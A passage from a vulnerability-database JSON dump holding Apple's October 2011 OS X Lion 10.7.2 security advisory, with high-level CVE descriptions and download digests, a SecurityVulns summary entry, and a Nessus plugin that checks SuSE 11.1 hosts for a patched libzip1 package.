and v10.7.1.\r\nImpact: Root certificates have been updated\r\nDescription: Several trusted certificates were added to the list of\r\nsystem roots. Several existing certificates were updated to their\r\nmost recent version. The complete list of recognized system roots may\r\nbe viewed via the Keychain Access application.\r\n\r\nCFNetwork\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Safari may store cookies it is not configured to accept\r\nDescription: A synchronization issue existed in CFNetwork's handling\r\nof cookie policies. Safari's cookie preferences may not be honored,\r\nallowing websites to set cookies that would be blocked were the\r\npreference enforced. This update addresses the issue through improved\r\nhandling of cookie storage.\r\nCVE-ID\r\nCVE-2011-0231 : Martin Tessarek, Steve Riggins of Geeks R Us, Justin\r\nC. Walker, and Stephen Creswell\r\n\r\nCFNetwork\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of sensitive information\r\nDescription: An issue existed in CFNetwork's handling of HTTP\r\ncookies. When accessing a maliciously crafted HTTP or HTTPS URL,\r\nCFNetwork could incorrectly send the cookies for a domain to a server\r\noutside that domain. This issue does not affect systems prior to OS X\r\nLion.\r\nCVE-ID\r\nCVE-2011-3246 : Erling Ellingsen of Facebook\r\n\r\nCoreFoundation\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted website or e-mail message may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A memory corruption issue existed in CoreFoundation's\r\nhandling of string tokenization. This issue does not affect OS X Lion\r\nsystems. This update addresses the issue through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2011-0259 : Apple\r\n\r\nCoreMedia\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of video data from another site\r\nDescription: A cross-origin issue existed in CoreMedia's handling of\r\ncross-site redirects. This issue is addressed through improved origin\r\ntracking.\r\nCVE-ID\r\nCVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability\r\nResearch (MSVR)\r\n\r\nCoreMedia\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of QuickTime movie files. These issues do not affect OS X\r\nLion systems.\r\nCVE-ID\r\nCVE-2011-0224 : Apple\r\n\r\nCoreProcesses\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A person with physical access to a system may partially\r\nbypass the screen lock\r\nDescription: A system window, such as a VPN password prompt, that\r\nappeared while the screen was locked may have accepted keystrokes\r\nwhile the screen was locked. This issue is addressed by preventing\r\nsystem windows from requesting keystrokes while the screen is locked.\r\nThis issue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-0260 : Clint Tseng of the University of Washington, Michael\r\nKobb, and Adam Kemp\r\n\r\nCoreStorage\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Converting to FileVault does not erase all existing data\r\nDescription: After enabling FileVault, approximately 250MB at the\r\nstart of the volume was left unencrypted on the disk in an unused\r\narea. Only data which was present on the volume before FileVault was\r\nenabled was left unencrypted. This issue is addressed by erasing this\r\narea when enabling FileVault, and on the first use of an encrypted\r\nvolume affected by this issue. This issue does not affect systems\r\nprior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3212 : Judson Powers of ATC-NY\r\n\r\nFile Systems\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: An attacker in a privileged network position may manipulate\r\nHTTPS server certificates, leading to the disclosure of sensitive\r\ninformation\r\nDescription: An issue existed in the handling of WebDAV volumes on\r\nHTTPS servers. If the server presented a certificate chain that could\r\nnot be automatically verified, a warning was displayed and the\r\nconnection was closed. If the user clicked the "Continue" button in\r\nthe warning dialog, any certificate was accepted on the following\r\nconnection to that server. An attacker in a privileged network\r\nposition may have manipulated the connection to obtain sensitive\r\ninformation or take action on the server on the user's behalf. This\r\nupdate addresses the issue by validating that the certificate\r\nreceived on the second connection is the same certificate originally\r\npresented to the user.\r\nCVE-ID\r\nCVE-2011-3213 : Apple\r\n\r\nIOGraphics\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: A person with physical access may be able to bypass the\r\nscreen lock\r\nDescription: An issue existed with the screen lock when used with\r\nApple Cinema Displays. When a password is required to wake from\r\nsleep, a person with physical access may be able to access the system\r\nwithout entering a password if the system is in display sleep mode.\r\nThis update addresses the issue by ensuring that the lock screen is\r\ncorrectly activated in display sleep mode. This issue does not affect\r\nOS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3214 : Apple\r\n\r\niChat Server\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: A remote attacker may cause the Jabber server to consume\r\nsystem resources disproportionately\r\nDescription: An issue existed in the handling of XML external\r\nentities in jabberd2, a server for the Extensible Messaging and\r\nPresence Protocol (XMPP). jabberd2 expands external entities in\r\nincoming requests. This allows an attacker to consume system\r\nresources very quickly, denying service to legitimate users of the\r\nserver. This update addresses the issue by disabling entity expansion\r\nin incoming requests.\r\nCVE-ID\r\nCVE-2011-1755\r\n\r\nKernel\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A person with physical access may be able to access the\r\nuser's password\r\nDescription: A logic error in the kernel's DMA protection permitted\r\nfirewire DMA at loginwindow, boot, and shutdown, although not at\r\nscreen lock. This update addresses the issue by preventing firewire\r\nDMA at all states where the user is not logged in.\r\nCVE-ID\r\nCVE-2011-3215 : Passware, Inc.\r\n\r\nKernel\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: An unprivileged user may be able to delete another user's\r\nfiles in a shared directory\r\nDescription: A logic error existed in the kernel's handling of file\r\ndeletions in directories with the sticky bit.\r\nCVE-ID\r\nCVE-2011-3216 : Gordon Davisson of Crywolf, Linc Davis, R. Dormer,\r\nand Allan Schmid and Oliver Jeckel of brainworks Training\r\n\r\nlibsecurity\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted website or e-mail message may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An error handling issue existed when parsing a\r\nnonstandard certificate revocation list extension.\r\nCVE-ID\r\nCVE-2011-3227 : Richard Godbee of Virginia Tech\r\n\r\nMailman\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in Mailman 2.1.14\r\nDescription: Multiple cross-site scripting issues existed in Mailman\r\n2.1.14. These issues are addressed by improved encoding of characters\r\nin HTML output. Further information is available via the Mailman site\r\nat http://mail.python.org/pipermail/mailman-\r\nannounce/2011-February/000158.html This issue does not affect OS X\r\nLion systems.\r\nCVE-ID\r\nCVE-2011-0707\r\n\r\nMediaKit\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Opening a maliciously crafted disk image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of disk images. These issues do not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-3217 : Apple\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Any user may read another local user's password data\r\nDescription: An access control issue existed in Open Directory. This\r\nissue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3435 : Arek Dreyer of Dreyer Network Consultants, Inc, and\r\nPatrick Dunstan at defenseindepth.net\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: An authenticated user may change that account's password\r\nwithout providing the current password\r\nDescription: An access control issue existed in Open Directory. This\r\nissue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3436 : Patrick Dunstan at defenceindepth.net\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A user may be able to log in without a password\r\nDescription: When Open Directory is bound to an LDAPv3 server using\r\nRFC2307 or custom mappings, such that there is no\r\nAuthenticationAuthority attribute for a user, an LDAP user may be\r\nallowed to log in without a password. This issue does not affect\r\nsystems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3226 : Jeffry Strunk of The University of Texas at Austin,\r\nSteven Eppler of Colorado Mesa University, Hugh Cole-Baker, and\r\nFrederic Metoz of Institut de Biologie Structurale\r\n\r\nPHP\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted PDF file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A signedness issue existed in FreeType's handling of\r\nType 1 fonts. This issue is addressed by updating FreeType to version\r\n2.4.6. This issue does not affect systems prior to OS X Lion. Further\r\ninformation is available via the FreeType site at\r\nhttp://www.freetype.org/\r\nCVE-ID\r\nCVE-2011-0226\r\n\r\nPHP\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in libpng 1.4.3\r\nDescription: libpng is updated to version 1.5.4 to address multiple\r\nvulnerabilities, the most serious of which may lead to arbitrary code\r\nexecution. Further information is available via the libpng website at\r\nhttp://www.libpng.org/pub/png/libpng.html\r\nCVE-ID\r\nCVE-2011-2690\r\nCVE-2011-2691\r\nCVE-2011-2692\r\n\r\nPHP\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in PHP 5.3.4\r\nDescription: PHP is updated to version 5.3.6 to address multiple\r\nvulnerabilities, the most serious of which may lead to arbitrary code\r\nexecution. This issues do not affect OS X Lion systems. Further\r\ninformation is available via the PHP website at http://www.php.net/\r\nCVE-ID\r\nCVE-2010-3436\r\nCVE-2010-4645\r\nCVE-2011-0420\r\nCVE-2011-0421\r\nCVE-2011-0708\r\nCVE-2011-1092\r\nCVE-2011-1153\r\nCVE-2011-1466\r\nCVE-2011-1467\r\nCVE-2011-1468\r\nCVE-2011-1469\r\nCVE-2011-1470\r\nCVE-2011-1471\r\n\r\npostfix\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may manipulate\r\nmail sessions, resulting in the disclosure of sensitive information\r\nDescription: A logic issue existed in Postfix in the handling of the\r\nSTARTTLS command. After receiving a STARTTLS command, Postfix may\r\nprocess other plain-text commands. An attacker in a privileged\r\nnetwork position may manipulate the mail session to obtain sensitive\r\ninformation from the encrypted traffic. This update addresses the\r\nissue by clearing the command queue after processing a STARTTLS\r\ncommand. This issue does not affect OS X Lion systems. Further\r\ninformation is available via the Postfix site at\r\nhttp://www.postfix.org/announcements/postfix-2.7.3.html\r\nCVE-ID\r\nCVE-2011-0411\r\n\r\npython\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in python\r\nDescription: Multiple vulnerabilities existed in python, the most\r\nserious of which may lead to arbitrary code execution. This update\r\naddresses the issues by applying patches from the python project.\r\nFurther information is available via the python site at\r\nhttp://www.python.org/download/releases/\r\nCVE-ID\r\nCVE-2010-1634\r\nCVE-2010-2089\r\nCVE-2011-1521\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in\r\nQuickTime's handling of movie files.\r\nCVE-ID\r\nCVE-2011-3228 : Apple\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSC\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSS\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0250 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSZ\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0251 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STTS\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0252 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may inject\r\nscript in the local domain when viewing template HTML\r\nDescription: A cross-site scripting issue existed in QuickTime\r\nPlayer's "Save for Web" export. The template HTML files generated by\r\nthis feature referenced a script file from a non-encrypted origin. An\r\nattacker in a privileged network position may be able to inject\r\nmalicious scripts in the local domain if the user views a template\r\nfile locally. This issue is resolved by removing the reference to an\r\nonline script. This issue does not affect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3218 : Aaron Sigel of vtty.com\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nH.264 encoded movie files.\r\nCVE-ID\r\nCVE-2011-3219 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to the\r\ndisclosure of memory contents\r\nDescription: An uninitialized memory access issue existed in\r\nQuickTime's handling of URL data handlers within movie files.\r\nCVE-ID\r\nCVE-2011-3220 : Luigi Auriemma working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: An implementation issue existed in QuickTime's handling\r\nof the atom hierarchy within a movie file.\r\nCVE-ID\r\nCVE-2011-3221 : an anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted FlashPix file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nFlashPix files.\r\nCVE-ID\r\nCVE-2011-3222 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nFLIC files.\r\nCVE-ID\r\nCVE-2011-3223 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nSMB File Server\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A guest user may browse shared folders\r\nDescription: An access control issue existed in the SMB File Server.\r\nDisallowing guest access to the share point record for a folder\r\nprevented the '_unknown' user from browsing the share point but not\r\nguests (user 'nobody'). This issue is addressed by applying the\r\naccess control to the guest user. This issue does not affect systems\r\nprior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3225\r\n\r\nTomcat\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in Tomcat 6.0.24\r\nDescription: Tomcat is updated to version 6.0.32 to address multiple\r\nvulnerabilities, the most serious of which may lead to a cross site\r\nscripting attack. Tomcat is only provided on Mac OS X Server systems.\r\nThis issue does not affect OS X Lion systems. Further information is\r\navailable via the Tomcat site at http://tomcat.apache.org/\r\nCVE-ID\r\nCVE-2010-1157\r\nCVE-2010-2227\r\nCVE-2010-3718\r\nCVE-2010-4172\r\nCVE-2011-0013\r\nCVE-2011-0534\r\n\r\nUser Documentation\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may manipulate\r\nApp Store help content, leading to arbitrary code execution\r\nDescription: App Store help content was updated over HTTP. This\r\nupdate addresses the issue by updating App Store help content over\r\nHTTPS. This issue does not affect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3224 : Aaron Sigel of vtty.com\r\n\r\nWeb Server\r\nAvailable for: Mac OS X Server v10.6.8\r\nImpact: Clients may be unable to access web services that require\r\ndigest authentication\r\nDescription: An issue in the handling of HTTP Digest authentication\r\nwas addressed. Users may be denied access to the server's resources,\r\nwhen the server configuration should have allowed the access. This\r\nissue does not represent a security risk, and was addressed to\r\nfacilitate the use of stronger authentication mechanisms. Systems\r\nrunning OS X Lion Server are not affected by this issue.\r\n\r\nX11\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in libpng\r\nDescription: Multiple vulnerabilities existed in libpng, the most\r\nserious of which may lead to arbitrary code execution. These issues\r\nare addressed by updating libpng to version 1.5.4 on OS Lion systems,\r\nand to 1.2.46 on Mac OS X v10.6 systems. Further information is\r\navailable via the libpng website at\r\nhttp://www.libpng.org/pub/png/libpng.html\r\nCVE-ID\r\nCVE-2011-2690\r\nCVE-2011-2691\r\nCVE-2011-2692\r\n\r\nOS X Lion v10.7.2 also includes Safari 5.1.1. For information on\r\nthe security content of Safari 5.1.1, please visit:\r\nhttp://support.apple.com/kb/HT5000\r\n\r\nOS X Lion v10.7.2 and Security Update 2011-006 may be obtained from\r\nthe Software Update pane in System Preferences, or Apple's Software\r\nDownloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nThe Software Update utility will present the update that applies\r\nto your system configuration. Only one is needed, either\r\nSecurity Update 2011-006 or OS X v10.7.2.\r\n\r\nFor OS X Lion v10.7.1\r\nThe download file is named: MacOSXUpd10.7.2.dmg\r\nIts SHA-1 digest is: 37f784e08d4461e83a891a7f8b8af24c2ceb8229\r\n\r\nFor OS X Lion v10.7\r\nThe download file is named: MacOSXUpdCombo10.7.2.dmg\r\nIts SHA-1 digest is: accd06d610af57df24f62ce7af261395944620eb\r\n\r\nFor OS X Lion Server v10.7.1\r\nThe download file is named: MacOSXServerUpd10.7.2.dmg\r\nIts SHA-1 digest is: e4084bf1dfa295a42f619224d149e515317955da\r\n\r\nFor OS X Lion Server v10.7\r\nThe download file is named: MacOSXServerUpdCombo10.7.2.dmg\r\nIts SHA-1 digest is: 25e86f5cf97b6644c7a025230431b1992962ec4a\r\n\r\nFor Mac OS X v10.6.8\r\nThe download file is named: SecUpd2011-006Snow.dmg\r\nIts SHA-1 digest is: 0f9c29610a06370d0c85a4c92dc278a48ba17a84\r\n\r\nFor Mac OS X Server v10.6.8\r\nThe download file is named: SecUpdSrvr2011-006.dmg\r\nIts SHA-1 digest is: 12de3732710bb03059f93527189d221c97ef8a06\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOlc/zAAoJEGnF2JsdZQeeWFcH/RDHS+dCP8T4a92uYRIbs9T3\r\nTFbT7hnOoTB0H+2eN3oziLNime2N4mO921heHobiAKSXv/luU41ZPHxVd6rE77Md\r\n/BHDqLv65RA0XFTIPmrTcfpLhI5UgXDLfOLrsmdwTm52l5zQZkoxufYFf3mB3h7U\r\nZJUD1s081Pjy45/Cbao097+JrDwS7ahhgkvTmpmSvJK/wWRz4JtZkvIYcQ2uQFR4\r\nsTg4l6pmi3d8sJJ4wzrEaxDpclRjvjURI4DiBMYwGAXeCMRgYi0y03tYtkjXoaSG\r\n69h2yD8EXQBuJkDyouak7/M/eMwUfb2S6o1HyXTldjdvFBFvvwvl+Y3xp8YmDzU=\r\n=gsvn\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27155", "title": "APPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "description": "Multiple vulnerabilities in different system components.", "edition": 1, "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SECURITYVULNS:VULN:11973", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11973", "title": "Apple OS X multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-01T06:00:56", "description": "The following bug has been fixed :\n\n - empty zip archives could crash programs using libzip.\n (CVE-2011-0421)", "edition": 20, "published": "2011-05-09T00:00:00", "title": "SuSE 11.1 Security Update : libzip1 (SAT Patch Number 4191)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libzip1", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_LIBZIP1-110321.NASL", "href": "https://www.tenable.com/plugins/nessus/53839", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53839);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2011-0421\");\n\n script_name(english:\"SuSE 11.1 Security Update : libzip1 (SAT Patch Number 4191)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bug has been fixed :\n\n - empty zip archives could crash programs using libzip.\n (CVE-2011-0421)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=681193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0421.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4191.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libzip1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libzip1-0.9-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libzip1-0.9-1.24.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libzip1-0.9-1.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:08:57", "description": "empty zip archives could crash programs using libzip (CVE-2011-0421).", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libzip-devel (openSUSE-SU-2011:0449-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0421"], "modified": 